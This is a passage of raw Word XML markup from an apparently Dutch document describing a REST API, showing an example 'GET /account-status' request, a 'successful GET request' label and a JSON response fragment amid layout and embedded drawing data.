                              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t xml:space="preserve">GET </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="808030"/>
                              </w:rPr>
                              <w:t>/</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>account</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="808030"/>
                              </w:rPr>
                              <w:t>-</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>status</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="800080"/>
                              </w:rPr>
                              <w:t>?</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>id</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="808030"/>
                              </w:rPr>
                              <w:t>=</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>id HTTP</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="808030"/>
                              </w:rPr>
                              <w:t>/</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="008000"/>
                              </w:rPr>
                              <w:t>1.1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4EF301CD" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00C247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3020E1" id="Text Box 208" o:spid="_x0000_s1082" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.85pt;margin-top:289.6pt;width:462pt;height:27pt;z-index:25193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aTCkYgCAACNBQAADgAAAGRycy9lMm9Eb2MueG1srFRLTxsxEL5X6n+wfC+bpOGRiA1KQVSVEKBC&#10;xdnx2mRVr8e1nWTTX9/P3myIKBeqXnbHM9+8H+cXbWPYWvlQky358GjAmbKSqto+l/zH4/WnM85C&#10;FLYShqwq+VYFfjH7+OF846ZqREsylfIMRmyYblzJlzG6aVEEuVSNCEfklIVQk29ExNM/F5UXG1hv&#10;TDEaDE6KDfnKeZIqBHCvOiGfZftaKxnvtA4qMlNyxBbz1+fvIn2L2bmYPnvhlrXchSH+IYpG1BZO&#10;96auRBRs5eu/TDW19BRIxyNJTUFa11LlHJDNcPAqm4elcCrnguIEty9T+H9m5e363rO6KvlogFZZ&#10;0aBJj6qN7Au1LPFQoY0LUwAfHKCxhQCd7vkBzJR4q32T/kiJQY5ab/f1TeYkmMdnJ6fjAUQSss/j&#10;0QQ0zBcv2s6H+FVRwxJRco/+5bKK9U2IHbSHJGeWrmtjcg+NTYxApq4SLz/SEKlL49laoP2xzUHD&#10;2wEKr05T5WHZeUkJd4llKm6NSgaN/a40ipXze8ODkFLZ2HvJ6ITSiOc9ijt8Uu2ieo/yXiN7Jhv3&#10;yk1tyedq5u16KUz1sw9Zd3i05CDvRMZ20eYpGU/6xi+o2mIePHU7FZy8rtG0GxHivfBYIvQZhyHe&#10;4aMNbUpOO4qzJfnfb/ETHrMNKWcbLGXJw6+V8Ioz881i6ifD8ThtcX6Mj09HePhDyeJQYlfNJaHx&#10;Q5wgJzOZ8NH0pPbUPOF+zJNXiISV8I1J6cnL2J0K3B+p5vMMwt46EW/sg5PJdCpzGsnH9kl4t5vb&#10;iIm/pX59xfTV+HbYpGlpvoqk6zzbqdBdVXcNwM7n7djdp3RUDt8Z9XJFZ38AAAD//wMAUEsDBBQA&#10;BgAIAAAAIQAMe+UO5AAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9NT8JAEIbvJv6HzZh4g+1H&#10;bKV2ShRCYggeAEM8Lu3YNnZnm+4C5d+7nPQ4eZ+87zP5fNSdONNgW8MI4TQAQVyaquUa4XO/mjyD&#10;sE5xpTrDhHAlC/Pi/i5XWWUuvKXzztXCl7DNFELjXJ9JacuGtLJT0xP77NsMWjl/DrWsBnXx5bqT&#10;URAkUquW/UKjelo0VP7sThrhfX9db9PFR6LXb8uvzUHaw2q5QXx8GF9fQDga3R8MN32vDoV3OpoT&#10;V1Z0CJMwTD2K8JTOIhCemIVRDOKIkMRxBLLI5f8fil8AAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZ&#10;w8D7AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYA&#10;CAAAACEAI7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYA&#10;CAAAACEA5aTCkYgCAACNBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAU&#10;AAYACAAAACEADHvlDuQAAAALAQAADwAAAAAAAAAAAAAAAADgBAAAZHJzL2Rvd25yZXYueG1sUEsF&#10;BgAAAAAEAAQA8wAAAPEFAAAAAA==&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7D555D8E" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00C24703">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t xml:space="preserve">GET </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="808030"/>
                        </w:rPr>
                        <w:t>/</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>account</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="808030"/>
                        </w:rPr>
                        <w:t>-</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>status</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="800080"/>
                        </w:rPr>
                        <w:t>?</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>id</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="808030"/>
                        </w:rPr>
                        <w:t>=</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>id HTTP</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="808030"/>
                        </w:rPr>
                        <w:t>/</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="008000"/>
                        </w:rPr>
                        <w:t>1.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4EF301CD" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00C24703"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006123D8">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251936768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="36068C38" wp14:editId="7716EDFB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-74295</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>243205</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5841365" cy="231140"/>
                <wp:effectExtent l="0" t="0" r="26035" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="206" name="Text Box 206"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5841365" cy="231140"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent6">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A68ECDD" w14:textId="45D15A6E" w:rsidR="00CE4BB5" w:rsidRPr="00020970" w:rsidRDefault="00CE4BB5" w:rsidP="006123D8">
                            <w:r>
                              <w:t>Succesvol GET</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00020970">
                              <w:t xml:space="preserve">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068C38" id="Text Box 206" o:spid="_x0000_s1083" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.85pt;margin-top:19.15pt;width:459.95pt;height:18.2pt;z-index:251936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6htagCAAD0BQAADgAAAGRycy9lMm9Eb2MueG1srFTdb9MwEH9H4n+w/M7SdG0Z1dKpdBpCGttE&#10;h/bsOnYbYfuM7TYpfz1nJ2nLAKEh+pCe7/t+93F51WhFdsL5CkxB87MBJcJwKCuzLuiXx5s3F5T4&#10;wEzJFBhR0L3w9Gr2+tVlbadiCBtQpXAEnRg/rW1BNyHYaZZ5vhGa+TOwwqBQgtMs4NOts9KxGr1r&#10;lQ0Hg0lWgyutAy68R+51K6Sz5F9KwcO9lF4EogqKuYX0dem7it9sdsmma8fspuJdGuwfstCsMhj0&#10;4OqaBUa2rvrFla64Aw8ynHHQGUhZcZFqwGrywbNqlhtmRaoFwfH2AJP/f2753e7Bkaos6HAwocQw&#10;jU16FE0g76EhkYcI1dZPUXFpUTU0KMBO93yPzFh4I52O/1gSQTlivT/gG91xZI4vRvn5ZEwJR9nw&#10;PM9HqQHZ0do6Hz4I0CQSBXXYvwQr2936gJmgaq8Sg3lQVXlTKZUecWbEQjmyY9htxrkwYZLM1VZ/&#10;grLljwb4a/uObJyOlj3p2RgiTV/0lAL+FESZv8UNTcImujlmh6/WUqSZ7IqJuLb4JSrslYjelfks&#10;JPYkwfjHyvooSTtqScThJYadfjRts3qJ8cEiRQYTDsa6MuAS6gcYW4TLr33KstVHdE/qjmRoVk0a&#10;xnHqUGStoNzj2DloV9dbflPhbNwyHx6Yw13FScP7E+7xIxXUBYWOomQD7vvv+FEfVwillNS4+wX1&#10;37bMCUrUR4PL9S4f4WSSkB6j8dshPtypZHUqMVu9ABy4HC+d5YmM+kH1pHSgn/BMzWNUFDHDMXZB&#10;Q08uQnuR8MxxMZ8nJTwPloVbs7Q8uo4wx8l/bJ6Ys916BFysO+ivBJs+25JWN1oamG8DyCqt0BHV&#10;rgF4WtKgd2cw3q7Td9I6HuvZDwAAAP//AwBQSwMEFAAGAAgAAAAhAN1gjYjcAAAACQEAAA8AAABk&#10;cnMvZG93bnJldi54bWxMj0FPhDAQhe8m/odmTLztFliVigyb1WTPhtWLty4dgUinhBYW/731pMfJ&#10;+/LeN+V+tYNYaPK9Y4R0m4AgbpzpuUV4fztuFAgfNBs9OCaEb/Kwr66vSl0Yd+GallNoRSxhX2iE&#10;LoSxkNI3HVntt24kjtmnm6wO8ZxaaSZ9ieV2kFmSPEire44LnR7ppaPm6zRbhMNr3cx5qhRl9+tC&#10;H3UX6PiMeHuzHp5ABFrDHwy/+lEdquh0djMbLwaETZrmEUXYqR2ICDwmKgNxRsjvcpBVKf9/UP0A&#10;AAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250&#10;ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAs&#10;AQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA+26htagCAAD0BQAADgAAAAAAAAAAAAAAAAAs&#10;AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA3WCNiNwAAAAJAQAADwAAAAAAAAAAAAAA&#10;AAAABQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAAkGAAAAAA==&#10;" fillcolor="#c5e0b3 [1305]" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3A68ECDD" w14:textId="45D15A6E" w:rsidR="00CE4BB5" w:rsidRPr="00020970" w:rsidRDefault="00CE4BB5" w:rsidP="006123D8">
                      <w:r>
                        <w:t>Succesvol GET</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00020970">
                        <w:t xml:space="preserve"> Request</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00191685">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251910144" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="230F00F0" wp14:editId="11036075">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-68580</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1153795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5874385" cy="1717040"/>
                <wp:effectExtent l="0" t="0" r="18415" b="35560"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="48" name="Text Box 48"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5874385" cy="17170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6BB5972" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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6C634A65" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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3829F8AE" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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3D360BF2" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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data</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>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proofErr w:type="gramEnd"/>
                            <w:r w:rsidRPr="000B674F">
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r w:rsidRPr="000B674F">
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="808030"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>[</w:t>
                            </w:r>
                            <w:r w:rsidRPr="000B674F">
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="800080"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>{</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5D75097F" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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p>
                          <w:p w14:paraId="6DFA2B05" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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id</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>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proofErr w:type="gramEnd"/>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r w:rsidRPr="000B674F">
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="808030"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>,</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="31514F83" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000B674F">
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="0000E6"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>actief</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gramStart"/>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proofErr w:type="gramEnd"/>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p>
                          <w:p w14:paraId="17640F43" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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4AA396E" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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808030"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>]</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="416A24BA" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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00FBF7A" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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17315EE0" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="003702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F00F0" id="Text Box 48" o:spid="_x0000_s1084" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.4pt;margin-top:90.85pt;width:462.55pt;height:135.2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1bRr4oCAACMBQAADgAAAGRycy9lMm9Eb2MueG1srFRLTxsxEL5X6n+wfC+b0KRJIzYoBVFVQoAK&#10;FWfHa5NVvR7XdpJNf30/ezcholyoetkdz/vxzZydt41hG+VDTbbkw5MBZ8pKqmr7VPIfD1cfppyF&#10;KGwlDFlV8p0K/Hz+/t3Z1s3UKa3IVMozOLFhtnUlX8XoZkUR5Eo1IpyQUxZCTb4REU//VFRebOG9&#10;McXpYPCp2JKvnCepQgD3shPyefavtZLxVuugIjMlR24xf33+LtO3mJ+J2ZMXblXLPg3xD1k0orYI&#10;enB1KaJga1//5aqppadAOp5IagrSupYq14BqhoMX1dyvhFO5FjQnuEObwv9zK282d57VVclHmJQV&#10;DWb0oNrIvlDLwEJ/ti7MoHbvoBhb8DHnPT+AmcputW/SHwUxyNHp3aG7yZsEczydjD5Ox5xJyIaT&#10;4WQwyv0vns2dD/GrooYlouQe48tdFZvrEJEKVPcqKZqlq9qYPEJjEyOQqavEy4+EIXVhPNsITD+2&#10;OWu4ONLCq7NUGSt9lFRxV1mm4s6o5NDY70qjV7nAVyIIKZWN+yhZO2lp5PMWw14/mXZZvcX4YJEj&#10;k40H46a25HM383I9N6b6uU9Zd/ro81HdiYztss0gGR8mv6RqB0B46lYqOHlVY2jXIsQ74bFDwADu&#10;QrzFRxvalpx6irMV+d+v8ZM+oA0pZ1vsZMnDr7XwijPzzQL0n4cjQIbF/BiNJ6d4+GPJ8lhi180F&#10;YfBDXCAnM5n0o9mT2lPziPOxSFEhElYiNpCyJy9idylwfqRaLLIS1taJeG3vnUyuU5sTJB/aR+Fd&#10;j9sIyN/QfnvF7AV8O91kaWmxjqTrjO3U6K6r/QCw8hny/XlKN+X4nbWej+j8DwAAAP//AwBQSwME&#10;FAAGAAgAAAAhAIdeVKbjAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj0FPwkAUhO8m/ofNM/EG&#10;20UErN0ShZAYggfAEI9L99k2dt823QXKv/d50uNkJjPfZPPeNeKMXag9aVDDBARS4W1NpYaP/Wow&#10;AxGiIWsaT6jhigHm+e1NZlLrL7TF8y6WgksopEZDFWObShmKCp0JQ98isfflO2ciy66UtjMXLneN&#10;HCXJRDpTEy9UpsVFhcX37uQ0vO2v6+108T5x69fl5+Ygw2G13Gh9f9e/PIOI2Me/MPziMzrkzHT0&#10;J7JBNBoGKmH0yMZMTUFw4kmNH0AcNYwfRwpknsn/H/IfAAAA//8DAFBLAQItABQABgAIAAAAIQDk&#10;mcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAG&#10;AAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAG&#10;AAgAAAAhAPNW0a+KAgAAjAUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0A&#10;FAAGAAgAAAAhAIdeVKbjAAAACwEAAA8AAAAAAAAAAAAAAAAA4gQAAGRycy9kb3ducmV2LnhtbFBL&#10;BQYAAAAABAAEAPMAAADyBQAAAAA=&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="56BB5972" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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6C634A65" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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3829F8AE" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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3D360BF2" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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data</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>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proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="000B674F">
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidRPr="000B674F">
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="808030"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>[</w:t>
                      </w:r>
                      <w:r w:rsidRPr="000B674F">
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="800080"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>{</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5D75097F" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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p>
                    <w:p w14:paraId="6DFA2B05" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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id</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>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proofErr w:type="gramEnd"/>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r w:rsidRPr="000B674F">
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="808030"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>,</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="31514F83" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000B674F">
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="0000E6"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>actief</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gramStart"/>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proofErr w:type="gramEnd"/>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p>
                    <w:p w14:paraId="17640F43" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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4AA396E" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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808030"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>]</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="416A24BA" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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00FBF7A" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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17315EE0" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0037022C"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00191685">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251898880" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69502A6D" wp14:editId="699F1918">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5893435</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>814070</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18" name="Curved Left Arrow 218"/>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17DD79" id="Curved Left Arrow 218" o:spid="_x0000_s1026" type="#_x0000_t103" style="position:absolute;margin-left:464.05pt;margin-top:64.1pt;width:22pt;height:45pt;z-index:25189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nGWUpsCAADCBQAADgAAAGRycy9lMm9Eb2MueG1srFRNb9swDL0P2H8QdF8dB+m6BnWKIEWHAUFb&#10;LB16VmQpNiCLGqXEyX79KNlx+oUNGHaRRZN8JJ9IXl3vG8N2Cn0NtuD52YgzZSWUtd0U/Mfj7acv&#10;nPkgbCkMWFXwg/L8evbxw1XrpmoMFZhSISMQ66etK3gVgptmmZeVaoQ/A6csKTVgIwKJuMlKFC2h&#10;NyYbj0afsxawdAhSeU9/bzolnyV8rZUM91p7FZgpOOUW0onpXMczm12J6QaFq2rZpyH+IYtG1JaC&#10;DlA3Igi2xfoNVFNLBA86nEloMtC6lirVQNXko1fVrCrhVKqFyPFuoMn/P1h5t3tAVpcFH+f0VFY0&#10;9EiLLe5UyZZKBzZHhJZFJVHVOj8lj5V7wF7ydI117zU28UsVsX2i9zDQq/aBSfo5vricjOgRJKnO&#10;L/JzuhNKdnJ26MNXBQ2Ll4LLlEbMIiWR+BW7pQ+d19E6hvVg6vK2NiYJsXnUwiDbCXr29Wbcx3lh&#10;ZezfHMM+f+tI6UbPLFLRFZ9u4WBUxDP2u9LEZyw3JZw6+ZSMkFLZkHeqSpSqy5G4GNgYPBI3CTAi&#10;a6puwO4BXhZ6xO7o6e2jq0qDMDiP/pRY5zx4pMhgw+Dc1BbwPQBDVfWRO/sjSR01kaU1lAfqNoRu&#10;DL2TtzW99FL48CCQ5o6ag3ZJuKdDG2gLDv2Nswrw13v/oz2NA2k5a2mOC+5/bgUqzsw3S4NymU8m&#10;cfCTMDm/GJOAzzXr5xq7bRZAPZPT1nIyXaN9MMerRmieaOXMY1RSCSspNvVqwKOwCN1+oaUl1Xye&#10;zGjYnQhLu3IygkdWY/s+7p8Eur7dA83JHRxnXkxftXpnGz0tzLcBdJ3m4MRrzzctitQ4/VKLm+i5&#10;nKxOq3f2GwAA//8DAFBLAwQUAAYACAAAACEA8pihj90AAAALAQAADwAAAGRycy9kb3ducmV2Lnht&#10;bEyPwU7DMBBE70j8g7VIvVEnPgQ3xKlQJSRaiQMt3N14SSLidRS7bfr3XU5w3Jmn2ZlqPftBnHGK&#10;fSAD+TIDgdQE11Nr4PPw+qhBxGTJ2SEQGrhihHV9f1fZ0oULfeB5n1rBIRRLa6BLaSyljE2H3sZl&#10;GJHY+w6Tt4nPqZVushcO94NUWVZIb3viD50dcdNh87M/eQPvhQ4FzVv9hlvKgtzkY7/7MmbxML88&#10;g0g4pz8Yfutzdai50zGcyEUxGFgpnTPKhtIKBBOrJ8XK0YDKWZF1Jf9vqG8AAAD//wMAUEsBAi0A&#10;FAAGAAgAAAAhAOSZw8D7AAAA4QEAA